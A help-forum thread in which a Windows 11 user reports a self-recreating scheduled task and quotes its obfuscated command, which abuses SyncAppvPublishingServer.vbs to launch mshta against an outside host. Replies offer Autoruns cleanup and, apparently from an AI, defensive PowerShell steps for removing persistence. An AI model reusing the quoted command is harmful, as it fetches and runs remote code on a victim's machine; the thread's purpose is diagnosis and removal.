Share via

C:\\WINDOWS\System32\syncappvpublishingserver.vbs

miluan 0 Reputation points
2026-06-04T21:10:44.97+00:00

as the title says, my computer has a pop up from Windows Script Host showing the title sometimes as below:

User's image

(translates to "cannot find script file 'C:\WINDOWS\System32\syncappvpublishingserver.vbs' ")

I went through the task scheduling and found an operation called "UltahostService{GUID}" that would launch “wscript.exe %systemroot%\System32\SyncAppvPublishingServer.vbs ";*i**2\ms`h*e $('https:'+'//ulta'+'host.gl')", which will also create the dialog box above. I tried to delete or stop this operation, but neither works and will create an identical operation.

how can I fix this issue?

Edition Windows 11 family

Version 25H2

Installed on 2025/2/17 OS Build 26200.8457

Processor 12th Gen Intel(R) Core(TM) i5-1240P (1.70 GHz)

System type 64-bit operating system, x64-based processor

Windows for home | Windows 11 | Performance and system failures
0 comments

2 answers

Sort by: Most helpful
Most helpful Newest Oldest
  1. Lester Bernard Reyes 80,780 Reputation points Independent Advisor
    2026-06-05T01:09:20.2833333+00:00

    Hi, I'm Bernard. I'm happy to help!

    The error is from Microsoft virtualization. To sort out the issue, I recommend running Autorun, wherein we will remove unnecessary files that are not in use and are corrupted.

     

    Go to this link: https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns

     

    Click "Download Autoruns and Autorunsc"

     

    Then open and run Autoruns

     

    Delete all highlighted with Pink and Yellow color (If you cannot delete some of those, it is okay to skip)

    Note: This is a public forum. I may respond shortly, but I apologize in advance for any delays. I am simply a fellow user trying to provide helpful insights and information.

    Was this answer helpful?

    0 comments

  2. AI answer

    2026-06-04T21:11:03.6366667+00:00

    The scheduled task and the script command that point to https://ultahost.gl indicate a malicious persistence mechanism that keeps recreating itself. Removing only the visible scheduled task is not enough; all persistence points that launch wscript.exe or PowerShell with that URL must be removed.

    Steps to clean it up:

    1. Remove malicious Run entries in the registry
      1. Open PowerShell as Administrator.
      2. List Run entries: 
              reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
      reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
      reg query HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
      3. If any value launches wscript.exe, powershell.exe, or references SyncAppvPublishingServer.vbs or ultahost.gl, delete it, for example: 
              reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "<value name>" /f
    2. Find and delete malicious scheduled tasks
      1. Still in elevated PowerShell, list all tasks and their actions: 
              Get-ScheduledTask | ForEach-Object {
          foreach ($a in $_.Actions) {
              "{0} | {1} {2}" -f ("$($_.TaskPath)$($_.TaskName)"), $a.Execute, $a.Arguments
          }
      }
      2. Look for any task whose action runs wscript.exe or powershell.exe with SyncAppvPublishingServer.vbs, ultahost.gl, or similar obfuscated arguments.
      3. For each suspicious task (for example UltahostService{GUID}), remove it: 
              Unregister-ScheduledTask -TaskName "UltahostService{GUID}" -Confirm:$false
        If it is under a custom path, include -TaskPath "\<path>\".
    3. Check for WMI-based persistence
      1. In elevated PowerShell, run: 
              Get-WmiObject -Namespace root\subscription -Class __EventFilter
      Get-WmiObject -Namespace root\subscription -Class CommandLineEventConsumer
      Get-WmiObject -Namespace root\subscription -Class ActiveScriptEventConsumer
      2. If any entry launches wscript.exe, powershell.exe, or contains ultahost.gl, remove it (or have an experienced technician remove those specific WMI objects).
    4. Check Startup folders
      1. Open:
        • %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
        • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
      2. Delete any unknown .vbs, .ps1, .bat, or shortcut that runs wscript.exe/powershell.exe with suspicious URLs.
    5. Verify no malicious PowerShell/WSH processes remain
      1. Run: 
              Get-CimInstance Win32_Process | Where-Object {$_.Name -like "powershell*" -or $_.Name -like "wscript*"} | Select Name,ProcessId,ParentProcessId,CommandLine
      2. Only processes started manually should appear; if any still show ultahost.gl or similar, repeat the checks above.
    6. Run a full security scan
      • After cleaning persistence, run a full scan with Microsoft Defender (and optionally an offline scan) to remove any remaining payloads.

    Once all registry Run entries, scheduled tasks, WMI consumers, and startup items that reference SyncAppvPublishingServer.vbs or ultahost.gl are removed, the Windows Script Host popup will stop appearing.

    References:

    AI-generated content may be incorrect. Read our transparency notes for more information.

    Was this answer helpful?

Your answer

Answers can be marked as 'Accepted' by the question author and 'Recommended' by moderators, which helps users know the answer solved the author's problem.